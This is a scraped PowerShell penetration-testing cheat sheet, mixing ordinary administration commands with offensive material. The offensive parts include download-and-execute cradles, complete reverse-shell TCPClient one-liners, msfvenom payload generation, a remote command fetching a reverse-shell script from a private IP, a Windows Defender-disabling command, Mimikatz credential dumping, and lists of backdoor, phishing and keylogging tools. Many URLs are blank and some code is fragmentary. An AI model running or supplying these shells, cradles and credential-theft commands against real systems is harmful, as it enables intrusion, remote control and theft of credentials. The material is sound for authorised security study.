Skip to content



Quick Reference

  • An A-Z Index of Windows PowerShell commands:
  • Windows PowerShell command line syntax:
  • - Allowing developers to find, edit and add PInvoke* signatures, user-defined types, and any other information related to calling Win32 and other unmanaged APIs from managed code (written in languages such as C# or VB.NET).
  • Versions
    • v1: November 2006 - Windows XP SP2, Windows Server 2003 SP1 and Windows Vista
    • v2: Windows 7 and Windows Server 2008 R2 (Standalone for: Windows XP SP3, Windows Server 2003 SP2, and Windows Vista SP1)
    • v3: Windows 8 (Can be installed on: Windows 7 SP1, for Windows Server 2008 SP1, and for Windows Server 2008 R2 SP1) (no XP support)
    • v4: Windows 8.1 (Can be installed on: Windows 7 SP1, for Windows Server 2008 SP1, and for Windows Server 2008 R2 SP1)
    • v5:
      • Part of Windows Management Framework (WMF) 5.0.
      • February 24, 2016.
      • Features OneGet PowerShell cmdlets to support Chocolatey's repository-based apps.
      • Ability to manage layer 2 network switches
      • Windows 10 Anniversary Update
      • Available for Windows 7, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, and Windows Server 2012 R2
    • v6: PowerShell Core on 18 August 2016
    • Versin information: $PSVersionTable
      Get-Host | Select-Object Version
  • Help System
    • Get-Help Get-Process
    • help Get-Process
    • Update-Help
    • Get-Help remoting
    • Get-Help about_*remot*
  • Basic Execution
    • 64 bit
      %SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe "IEX(New-Object Net.Webclient).DownloadString('')"
    • 32 bit
      START /MIN /LOW CMD /C %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe "IEX(New-Object Net.Webclient).DownloadString('')"
    • Using command line: echo IEX(New-Object Net.WebClient).DownloadString('') | PowerShell -Noprofile -
  • Basic Constructs
    • Cmdlets
    • Function
  • List all Cmdlets:
    • Get-Command -CommandTyle Cmdlet
    • Get-Command -Name *process*
  • Aliases: Get-Alias -Name ps Get-Alias -Definition Get-Process
  • Check Environment
    • C:\WIndows\Syswow64\Windowspowershell\v1.0\powershell.exe
      • PSModulePath
    • Version info: powershell -v 2.0 -c $psversiontable
    • Language mode: $host.runspace.languagemode
    • Check if AppLocker is enabled: Get-AppLockerPolicy -Local
    • Powershell Version: (Get-Host).Version
    • 64bit version: %SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe
  • Modules
    • . .\Example.ps1
    • Import-Module <path_to_module> -verbose
    • List all available modules: Get-Module -ListAvailable -All
      • List all modules available in: $env:PSModulePath
    • All functions exposed by a module: Get-Command -Module <module_name>
  • Command History (PSReadline)
    • cat (Get-PSReadlineOption).HistorySavePath | sls password
    • By default, the path is: profile:\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
  • System Information
    • Get-HotFix
  • Jobs
    • Run job on a remote machine using PSSession or by using -AsJob with -ComputerName. With -AsJob it's possible to see remote jobs using Get-Job.
      Start-Job -ScriptBlock {whoami}
      Start-Job -FilePath <path>
      Get-Job | Receive-Job
      Get-Job -id <id> | Receive-Job
      Get-Command -ParameterName AsJob
  • Directory search:Get-HttpStatus
  • Pass the Hash with Powershell
  • Persistence
    • WMI permanent event consumers
    • Windows registry
    • Scheduled tasks
  • Restricting Powershell
  • Bypass
  • Save output
    Get-Service | Export-CSV C:\Temp\AllServices.CSV –NoTypeInfo
    Get-User –Filter ‘Name –Like “*John”’ | Export-CSV C:\Temp\AllUsers.CSV –NoTypeInfo
    Get-ChildItem –Path C:\Windows\System32 | Export-CSV C:\Temp\AllFiles.CSV -NoTypeInfo
  • Reboots: Get-EventLog –Log System –Newest 100 | Where-Object {$_.EventID –eq ‘1074’} | FT MachineName, UserName, TimeGenerated -AutoSize
  • Search hotfix: Get-HotFix –ID KB2877616
  • Backup Group Policy: Backup-GPO –All –Path C:\Temp\AllGPO
  • Check if all DCs are Global Catalog Servers: Get-ADDomainController –Filter * | Select Hostname, IsGlobalCatalog
  • Powershell with HID
  • TCP / UDP / WMI Shells:

Download Files

powershell wget "" -outfile "abc.txt"
Invoke-WebRequest -Uri "" -OutFile $fullpath;
powershell -c "Invoke-WebRequest -Uri -OutFile C:\Users\kostas\Desktop\41020.exe"
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "" >>wget.ps1
echo $file = "example.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInterative -NoProfile -File wget.ps1

  • Base64 encoded payload delivery
    echo "iex (New-Object Net.WebClient).DownloadString('')" | iconv --to-code UTF-16LE | base64 -w 0
    kaliwmis-32 -U administrator%badpassword // "cmd.exe /c  powershell.exe -nop -enc <base64-value>"

Execution Policy

Reverse Shell

    Start-Process -FilePath powershell -argumentlist IEX(New-Object Net.WebClient).downloadString( -Credential $cred
    msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell -c iex(new-object net.webclient).downloadstring('')" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python > shellcode
    powercat -l -v -p 4444 -t 1000
    powershell -e "<encoded-payload>"
    $client = New-Object System.Net.Sockets.TCPClient("",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
    $sm=(New-Object Net.Sockets.TCPClient("",55555)).GetStream();[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Remote Script execution

- Invoke-Expression (New-Object Net.WebClient).DownloadString(''); - iex (New-Object Net.WebClient).DownloadString(''); - powershell -EncodedCommand <Base64EncodedCommand> - $ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('');sleep 5;$resp=$ie.Document.Body.innerHTML;$ie.quit();iex $resp - iex (iwr '') - $h=New-Object -ComObject Msxm12.XMLHTTP;$'GET', '' ,$false);$h.send();iex $h. responseText - Craft Download Cradles:

START /B "" powershell -c IEX (New-Object Net.Webclient).downloadstring('')
# _/B prevents creation of a new window_
$wr [System.NET.WebRequest]::Create("")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader] ($r.GetResponseStream())) .ReadToEnd()```

Powershell Remoting

  • Enabled by default from Windows Server 2012
    • Enable-PSRemoting -Force
  • Admin privileges are required to connect
  • Get-Command -CommandType cmdlet -ParameterName computername
  • Get-Command -CommandType cmdlet | Where-Object {$_Parameters.Keys --contains 'ComputerName' -and $_Parameters.Keys --contains 'Credential' -and $_Parameters.Keys --notcontains 'Session'}
  • WSMAN (WebServicesManagement) Protocol (WinRM)
    • WinRM is Microsoft’s implementation of WSMAN
    • Port 5985, 5986
    • If target is in a workgroup, attacker's machine should trust target machine to send out credentials:
      • Set-Item WSMan:\localhost\client\trustedhosts -Value *
    • Invoke-Command -ScriptBlock {$env:ComputerName} -ComputerName example -Credential dominName/userName
      • -FilePath
        Invoke-WSManAction -Action Create -ResourceURI wmicimv2/win32_process -ValueSet @{commandline="powershell.exe -c Get-Process"} - ComputerName domainpc Credential
        Invoke-WSManAction -Action Create -ResourceURI wmicimv2/win32_process -ValueSet @{commandline="powershell.exe -c iex ((New-Object Net.Webclient).DownloadString('http://192.168.254. 1/reverse_powershell.ps1'))"} -ComputerName domainpc
  • WSMAN vs PowerShell Remoting vs WMI
    • WSMAN
      • Firewall friendly
      • Use HTTP and HTTPS ports
      • Syntax is complex
      • Returns immutable objects
      • Can be used with non-Windows machines
    • Powershell Remoting
      • Firewall friendly
      • Easy use
      • Returns immutable objects
    • WMI
      • Not firewall friendly
      • Not NAT friendly
      • Complex
      • Returns editable objects
  • One to One
    • Invoke-Command is stateless for stageful operations use PSSession
      • Interactive, stateful session
      • Run in a new process wsmprovhost
    • New-PSSession
      • $ses = New-PSSession -ComputerName <name> -Credential <cred>
      • Get-PSSession
      • Enter-PSSession
    • Interactive session: Enter-PSSession -Sessions $ses
      • ​$cred = Get-Credential -> Enter-PSSession -ComputerName -Authentication Negotiate -Credential $cred
    • Define a function in a remote machine and call it:
      Invoke-Command -ScriptBlock {function Example1 {whoami;}} -Session $ses
      Invoke-Command -ScriptBlock {Example1} -Session $ses
      PSSession -CommandName Example1 -Session $ses
    • Export a command from a remote machine:
      Export-PSSession -Module <name> -CommandName Example1 -Session $ses
    • Double Hop Problem (Attacker delegate sending token to target-2 from target-1) image-20190615074509591
      Enable-WSManCredSSP -Role Client -DelegateComputer
      Enable-WSManCredSSP -Role Server
      Enter-PSSession -ComputerName <name> -Credential <cred> -Authentication CredSSP
    • Useful cmdlets
      • New-PSSession
      • Enter-PSSession
        Set-MpPreference -DisableRealtimeMonitoring $true #Disable Windows Defender
        New-PSSession -ComputerName instance
        $sess = New-PSSession -ComputerName instance
        Enter-PSSEssion - Session $sess
  • One to Many (Fan-out Remoting)
    • Non-interactive
    • Parallel command execution
    • Can:
      • Execute scripts from files
      • Run commands on multiple remote computers
      • Run commands in disconnected sessions (v3)
      • Run as background task
    • Useful in:
      • Perform command execution without dropping exe onto disk
      • Useful for passing and replying hashes, tickets and other AD attacks
    • Run commands:
      • Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName instance
      • Invoke-Command -ScriptBlock {Get-Process} -ComputerName (Get-Content <list-of-servers>)
    • Run scripts:
      • Invoke-Command -FilePath example.ps1 -ComputerName instance
    • Run functions installed on the remote box:
      • Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -ComputerName instance
    • Invoke-Command doesn't create a session.
    • Stateful commands:
      $sess = New-PSSession -ComputerName instance
      Invoke-Command -Session $sess -ScriptBlock {$proc = Get-Process}
      Invoke-Command -Session $sess -ScriptBlock {$proc.Name}


  • Mimikatz (ReflectivePEInjection is used to load into memory)

    • Dump Creds from multiple machines
      Invoke-Mimikatz -DumpCreds -ComputerName @("instance1", "instance2")
    • Load PowerUp
      powershell -ExecutionPolicy Bypass
      Import-Module ./PowerUp.ps1

Active Directory

  • [ADSI]
    • Get member of the domain admin group: ([ADSI]"LDAP://cn=Domain Admin,cn=Users,dc=Example,dc=com").Members
    • Get memberships of a user: ([ADSI]"LDAP://cn=Administrator,cn=Users,dc=Example,dc=com").MemberOf
  • .NET Class: System.DirectoryServices.ActiveDirectory
  • Native Executable
  • PowerShell (,Net classes or WMI or AD module)


  • Exploring Assemblies
    • Finding assemblies
      $Classes = [AppDomain]::CurrentDomain.GetAssemblies()
      $Classes = [AppDomain]::CurrentDomain.GetAssemblies() | ForEach-Object {$_.GetTypes()} | Where-Object {$_.IsPublic -eq "True"}
    • Working with assemblies and invoking functions
      $ProcClass = $Classes | Where-Object {$_.Name -eq "Proccess"}
      $ProcClass | Get-Members
      $ProcClass | Get-Members -MemberType Method -Static
      [System.Diagnostic.Process] | Get-Members -MemberType Method -Static | Format-List *
      Add-Type -AssemblyName System.Windows.Forms
    • AssemblyName
      Add-Type -AssemblyName System.ServiceProcess
      [System.ServiceProcess.ServiceController] | Get-Members -MemberType Method -Static | Format-List *
    • TypeDefinition
      $DotnetCode = @"
      public class SysCommands
      public static void lookup (string domainname) {
      System. Diagnostics.Process.Start("ns lookup.exe", domainname) ;
      public void netcmd (string cmd) {
      string cmdstring = "/k net.exe " + cmd;
      System. Diagnostics.Process.Start("cmd. exe" ,cmdstring) ;
      public static void Main() {
      string cmdstring = "/k net.exe " + "user";
      System. Diagnostics.Process.Start("cmd. exe",cmdstring);
      # Compile .Net code and load objects from it
      Add-Type -TypeDefinition $DotnetCode -OutputType Library -OutputAssembly SysCommand.dll
      Add-Type -TypeDefinition $DotnetCode -OutputType ConsoleApplication -OutputAssembly SysCommand.exe
      # Load objects from a DLL into Memory
      $obj = Add-Type -Path SysCommand.dll -PassThru
      $obj | Get-Members
      # Calling non-static functions
      $obj = New-Object SysCommands
      $obj .netcmd("user")#>
    • MemberDefinition - DLL Import
      $Apicode = @"
      public static extern bool CreateSymbolicLink(string IpSymlinkFileName, string IpTargetFileName, int dwFlags);
      $SymLink = Add-Type -MemberDefinition $ApiCode -Name Symlink -Namespace CreatSymLink -PassThru
      $SymLink::CreateSymbolicLink('C:\test\link', 'C:\Users\', 1)


  • Exploring namespaces: Get-WmiObject -Namespace "root" -Class "__Namespace" | select name
  • List even the nested namespaces:
  • Exploring Classes: Get-WmiObject –NameSpace “<namespace>” –List
  • Exploring Methods: Get-WmiObject -Class <class> -List | Select-Object -ExpandProperty Methods
  • Filter based on properties of objects getting returned:
    Get-WmiObject -Class Win32_Process -Filter (Name = "powershell.exe")
    Get-WmiObject -Class Win32_Process | Where-Object {$_.Name -eq "powershell.exe"}
    Get-WmiObject -Query {Select * from Win32_Process where Name = "powershell.exe"}
    Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "notepad.exe"
    Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "notepad.exe" - ComputerName <name> -Credential <cred>  

COM Objects

  • Explore available COM objects:
    Get-ChildItem REGISTRY::HKEY_CLASSES_ROOT\CLSID -include PROGID -recurse | foreach {$_.GetValue("")} | Where-Object {$_ -match “<appname>"}
    $wscript = New-Object -ComObject WScript.Shell.1
    $wscript | Get-Member
  • Interesting COM Objects
    • WScript.Shell.1
    • Shell.Applcation.1

Windows Registry

Get-Item 'HKLM:\SOFTWARE\Microsoft\Windows NT\Current Version'
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\Windows NT\Current Version' -Recurse
- Use registry as filesystem:
Get-Provider -PSProvider Registry
Set-Location Registry::
> ls
> cd HKLM
> ls

New-PSDrive -name RegistryDrive -PSProvider Registry -Root Registry::
> dir


New-Item -Path HKCU:\Test\New
New-ItemProperty -Path HKCU:\Test\New -Name Reg2 -PropertyType String -Value 2
Rename-Item HKCU:\Test -NewName HKCU:TestNew
Rename-ItemProperty HKCU:\Test\New -Name Reg2 -NewName Reg3
Set-ItemProperty -Path HKCU:\Test\New -Name Reg2 -Value 3

  • Client Side Attacks
    • Out-Word
    • Out-Excel
    • Out-CHM
    • Out-Shortcut
    • Out-HTA
    • Out-Java
  • Encoding
    • Invole-Encode -DataToEncode example.ps1 -OutCommand
      • Out-CHM -Payload "-e <encodedValue>"


  • Using Powershell with Metasploit:
    msfvenom meterpreter
    ./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> -f psh-reflection
  • Useful modules:
    • exploit/windows/smb/psexec_psh
      • Payload is encoded
    • exploit/windows/local/powershell_cmd_upgrade
      • Upgrade native to Powershell
    • post/windows/manage/powershell/exec_powershell
    • exploit/multi/script/web_delivery


  • Posh-SecMod
    • - PowerShell Module with Security cmdlets for security work
    • Discovery: Perform network discovery.
    • Parse: Parsers for Nmap, DNSRecon and other type of output files from security tools.
    • PostExploitation: Functions to help in performing post exploitation tasks.
    • Registry: Collection of functions for manipulating the registry in remote hosts using WMI.
    • Utilities: General purpose functions.
    • Audit: Functions that may be usful when performing audit of systems.
    • Database: Functions that are useful when interacting with databases.
  • PowerSploit
    • - A PowerShell Post-Exploitation Framework
    • CodeExecution
      • Invoke-DllInjectionInjects a Dll into the process ID of your choosing.
      • Invoke-ReflectivePEInjectionReflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.
      • Invoke-ShellcodeInjects shellcode into the process ID of your choosing or within PowerShell locally
      • .Invoke-WmiCommandExecutes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel.
    • ScriptModification
      • Out-EncodedCommandCompresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
      • Out-CompressedDllCompresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
      • Out-EncryptedScriptEncrypts text files/scripts.
      • Remove-CommentsStrips comments and extra whitespace from a script.
    • Persistence
      • New-UserPersistenceOptionConfigure user-level persistence options for the Add-Persistence function.
      • New-ElevatedPersistenceOptionConfigure elevated persistence options for the Add-Persistence function.
      • Add-PersistenceAdd persistence capabilities to a script.Install-SSPInstalls a security support provider (SSP) dll.
      • Get-SecurityPackagesEnumerates all loaded security packages (SSPs).
    • AntivirusBypass
      • Find-AVSignatureLocates single Byte AV signatures utilizing the same method as DSplit from "class101".
    • Exfiltration
      • Invoke-TokenManipulationLists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread.
        • Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system"
        • GetProcess lass | Invoke-TokenManipulation -ImperrsonateUser
      • Invoke-CredentialInjectionCreate logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).
      • Invoke-NinjaCopyCopies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
        • Copy from NTDS.dit, SYSTEM, SAM Hive
      • Invoke-MimikatzReflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz.
        • Invoke-Mimikatz -DumpCreds
        • Invoke-Mimikatz -DumpCerts
      • Get-KeystrokesLogs keys pressed, time and the active window.
      • Get-GPPPasswordRetrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
        • KB2928120
      • Get-GPPAutologonRetrieves autologon username and password from registry.xml if pushed through Group Policy Preferences.
      • Get-TimedScreenshotA function that takes screenshots at a regular interval and saves them to a folder.
      • New-VolumeShadowCopyCreates a new volume shadow copy.
      • Get-VolumeShadowCopyLists the device paths of all local volume shadow copies.
      • Mount-VolumeShadowCopyMounts a volume shadow copy.
      • Remove-VolumeShadowCopyDeletes a volume shadow copy.
      • Get-VaultCredentialDisplays Windows vault credential objects including cleartext web credentials.
      • Out-MinidumpGenerates a full-memory minidump of a process.
      • Get-MicrophoneAudioRecords audio from system microphone and saves to disk
    • Mayhem
      • Set-MasterBootRecordProof of concept code that overwrites the master boot record with the message of your choice.
      • Set-CriticalProcessCauses your machine to blue screen upon exiting PowerShell.
    • Privesc
      • PowerUpClearing house of common privilege escalation checks, along with some weaponization vectors.
        • Service Enumeration:
          • Get-ServiceUnquoted - returns services with unquoted paths that also have a space in the name
          • Get-ModifiableServiceFile - returns services where the current user can write to the service binary path or its config
          • Get-ModifiableService - returns services the current user can modify
          • Get-ServiceDetail - returns detailed information about a specified service
        • Service Abuse:
          • Invoke-ServiceAbuse - modifies a vulnerable service to create a local admin or execute a custom command
          • Write-ServiceBinary - writes out a patched C# service binary that adds a local admin or executes a custom command
          • Install-ServiceBinary - replaces a service binary with one that adds a local admin or executes a custom command
          • Restore-ServiceBinary - restores a replaced service binary with the original executable
        • DLL Hijacking:
          • Find-ProcessDLLHijack - finds potential DLL hijacking opportunities for currently running processes
          • Find-PathDLLHijack - finds service %PATH% DLL hijacking opportunities
          • Write-HijackDll - writes out a hijackable DLL
        • Registry Checks:
          • Get-RegistryAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set
          • Get-RegistryAutoLogon - checks for Autologon credentials in the registry
          • Get-ModifiableRegistryAutoRun - checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns
        • Miscellaneous Checks:
          • Get-ModifiableScheduledTaskFile - find schtasks with modifiable target files
          • Get-UnattendedInstallFile - finds remaining unattended installation files
          • Get-Webconfig - checks for any encrypted web.config strings
          • Get-ApplicationHost - checks for encrypted application pool and virtual directory passwords
          • Get-SiteListPassword - retrieves the plaintext passwords for any found McAfee's SiteList.xml files
          • Get-CachedGPPPassword - checks for passwords in cached Group Policy Preferences files
        • Other Helpers/Meta-Functions:
          • Get-ModifiablePath - tokenizes an input string and returns the files in it the current user can modify
          • Get-CurrentUserTokenGroupSid - returns all SIDs that the current user is a part of, whether they are disabled or not
          • Add-ServiceDacl - adds a Dacl field to a service object returned by Get-Service
          • Set-ServiceBinPath - sets the binary path for a service to a specified value through Win32 API methods
          • Test-ServiceDaclPermission - tests one or more passed services or service names against a given permission set
          • Write-UserAddMSI - write out a MSI installer that prompts for a user to be added
          • Invoke-AllChecks - runs all current escalation checks and returns a report
    • Recon
      • Invoke-PortscanDoes a simple port scan using regular sockets, based (pretty) loosely on nmap.
      • Get-HttpStatusReturns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file.
      • Invoke-ReverseDnsLookupScans an IP address range for DNS PTR records.
      • PowerViewPowerView is series of functions that performs network and Windows domain enumeration and exploitation.
        • Misc
          • Export-PowerViewCSV- thread-safe CSV append
          • Set-MacAttribute - Sets MAC attributes for a file based on another file or input (from Powersploit)
          • Copy-ClonedFile - copies a local file to a remote location, matching MAC properties
          • Get-IPAddress - resolves a hostname to an IP
          • Test-Server - tests connectivity to a specified server
          • Convert-NameToSid - converts a given user/group name to a security identifier (SID)
          • Convert-SidToName - converts a security identifier (SID) to a group/user name
          • Convert-NT4toCanonical - converts a user/group NT4 name (i.e. dev/john) to canonical format
          • Get-Proxy - enumerates local proxy settings
          • Get-PathAcl - get the ACLs for a local/remote file path with optional group recursion
          • Get-UserProperty - returns all properties specified for users, or a set of user:prop names
          • Get-ComputerProperty - returns all properties specified for computers, or a set of computer:prop names
          • Find-InterestingFile - search a local or remote path for files with specific terms in the name
          • Invoke-CheckLocalAdminAccess - check if the current user context has local administrator access to a specified host
          • Get-DomainSearcher - builds a proper ADSI searcher object for a given domain
          • Get-ObjectAcl - returns the ACLs associated with a specific active directory object
          • Add-ObjectAcl - adds an ACL to a specified active directory object
          • Get-LastLoggedOn - return the last logged on user for a target host
          • Get-CachedRDPConnection - queries all saved RDP connection entries on a target host
          • Invoke-ACLScanner - enumerate -1000+ modifable ACLs on a specified domain
          • Get-GUIDMap - returns a hash table of current GUIDs -> display names
          • Get-DomainSID - return the SID for the specified domain
          • Invoke-ThreadedFunction - helper that wraps threaded invocation for other
        • net * Functions:
          • Get-NetDomain - gets the name of the current user's domain
          • Get-NetForest - gets the forest associated with the current user's domain
          • Get-NetForestDomain - gets all domains for the current forest
          • Get-NetDomainController - gets the domain controllers for the current computer's domain
          • Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)
          • Add-NetUser - adds a local or domain user
          • Get-NetComputer - gets a list of all current servers in the domain
          • Get-NetPrinter - gets an array of all current computers objects in a domain
          • Get-NetOU - gets data for domain organization units
          • Get-NetSite - gets current sites in a domain
          • Get-NetSubnet - gets registered subnets for a domain
          • Get-NetGroup - gets a list of all current groups in a domain
          • Get-NetGroupMember - gets a list of all current users in a specified domain group
          • Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts
          • Add-NetGroupUser - adds a local or domain user to a local or domain group
          • Get-NetFileServer - get a list of file servers used by current domain users
          • Get-DFSshare - gets a list of all distribute file system shares on a domain
          • Get-NetShare - gets share information for a specified server
          • Get-NetLoggedon - gets users actively logged onto a specified server
          • Get-NetSession - gets active sessions on a specified server
          • Get-NetRDPSession - gets active RDP sessions for a specified server (like qwinsta)
          • Get-NetProcess - gets the remote processes and owners on a remote server
          • Get-UserEvent - returns logon or TGT events from the event log for a specified host
          • Get-ADObject - takes a domain SID and returns the user, group, or computer object associated with it
          • Set-ADObject - takes a SID, name, or SamAccountName to query for a specified domain object, and then sets a specified 'PropertyName' to a specified 'PropertyValue'
        • GPO functions:
          • Get-GptTmpl - parses a GptTmpl.inf to a custom object
          • Get-NetGPO - gets all current GPOs for a given domain
          • Get-NetGPOGroup - gets all GPOs in a domain that set "Restricted Groups" on on target machines
          • Find-GPOLocation - takes a user/group and makes machines they have effective rights over through GPO enumeration and correlation
          • Find-GPOComputerAdmin - takes a computer and determines who has admin rights over it through GPO enumeration
          • Get-DomainPolicy - returns the default domain or DC policy
        • User-Hunting Functions:
          • Invoke-UserHunter - finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines
          • Invoke-StealthUserHunter - finds all file servers utilizes in user HomeDirectories, and checks the sessions one each file server, hunting for particular users
          • Invoke-ProcessHunter - hunts for processes with a specific name or owned by a specific user on domain machines
          • Invoke-UserEventHunter - hunts for user logon events in domain controller event logs
        • Domain Trust Functions:
          • Get-NetDomainTrust - gets all trusts for the current user's domain
          • Get-NetForestTrust - gets all trusts for the forest associated with the current user's domain
          • Find-ForeignUser - enumerates users who are in groups outside of their principal domain
          • Find-ForeignGroup - enumerates all the members of a domain's groups and finds users that are outside of the queried domain
          • Invoke-MapDomainTrust - try to build a relational mapping of all domain trusts
        • MetaFunctions:
          • Invoke-ShareFinder - finds (non-standard) shares on hosts in the local domain
          • Invoke-FileFinder - finds potentially sensitive files on hosts in the local domain
          • Find-LocalAdminAccess - finds machines on the domain that the current user has local admin access to
          • Find-ManagedSecurityGroups - searches for active directory security groups which are managed and identify users who have write access to those groups (i.e. the ability to add or remove members)
          • Find-UserField - searches a user field for a particular term
          • Find-ComputerField - searches a computer field for a particular term
          • Get-ExploitableSystem - finds systems likely vulnerable to common exploits
          • Invoke-EnumerateLocalAdmin - enumerates members of the local Administrators groups across all machines in the domain
  • Nishang
    • - framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming
    • ActiveDirectory
    • Antak - the Webshell
      • AntakExecute PowerShell scripts in memory, run commands, and download and upload files using this webshell.
    • Backdoors
      • HTTP-BackdoorA backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
      • DNS_TXT_PwnageA backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
      • Execute-OnTimeA backdoor which can execute PowerShell scripts at a given time on a target.
      • Gupt-BackdoorA backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
      • Add-ScrnSaveBackdoorA backdoor which can use Windows screen saver for remote command and script execution.
      • Invoke-ADSBackdoorA backdoor which can use alternate data streams and Windows Registry to achieve persistence.
      • Add-RegBackdoorA backdoor which uses well known Debugger trick to execute payload with Sticky keys and Utilman (Windows key + U).
      • Set-RemoteWMIModify permissions of DCOM and WMI namespaces to allow access to a non-admin user.
      • Set-RemotePSRemotingModify permissions of PowerShell remoting to allow access to a non-admin user.
    • Bypass
    • Client
      • Out-CHMCreate infected CHM files which can execute PowerShell commands and scripts.
      • Out-WordCreate Word files and infect existing ones to run PowerShell commands and scripts.
      • Out-ExcelCreate Excel files and infect existing ones to run PowerShell commands and scripts.
      • Out-HTACreate a HTA file which can be deployed on a web server and used in phishing campaigns.
      • Out-JavaCreate signed JAR files which can be used with applets for script and command execution.
      • Out-ShortcutCreate shortcut files capable of executing PowerShell commands and scripts.
      • Out-WebQueryCreate IQY files for phishing credentials and SMB hashes.
      • Out-JSCreate JS files capable of executing PowerShell commands and scripts.
      • Out-SCTCreate SCT files capable of executing PowerShell commands and scripts.
      • Out-SCFCreate a SCF file which can be used for capturing NTLM hash challenges.
    • Escalation
    • Execution
      • Download-Execute-PSDownload and execute a PowerShell script in memory.
      • Download_ExecuteDownload an executable in text format, convert it to an executable, and execute.
      • Execute-Command-MSSQLRun PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
      • Execute-DNSTXT-CodeExecute shellcode in memory using DNS TXT queries.
      • Out-RundllCommandExecute PowerShell commands and scripts or a reverse PowerShell session using rundll32.exe.
    • Gather
    • MITM
    • Pivot
    • Prasadhak
      • PrasadhakCheck running hashes of running process against the VirusTotal database.
    • Scan
      • Brute-ForceBrute force FTP, Active Directory, MSSQL, and Sharepoint.
      • Port-ScanA handy port scanner.
      • Powerpreter
      • PowerpreterAll the functionality of nishang in a single script module.
    • Shells
    • Utility
  • External Services
  • Scaning
  • Brute Forcing
  • Database Attacks
  • Capture NTLM
  • Obfuscation
  • Fileless Malware


New References

Development Environment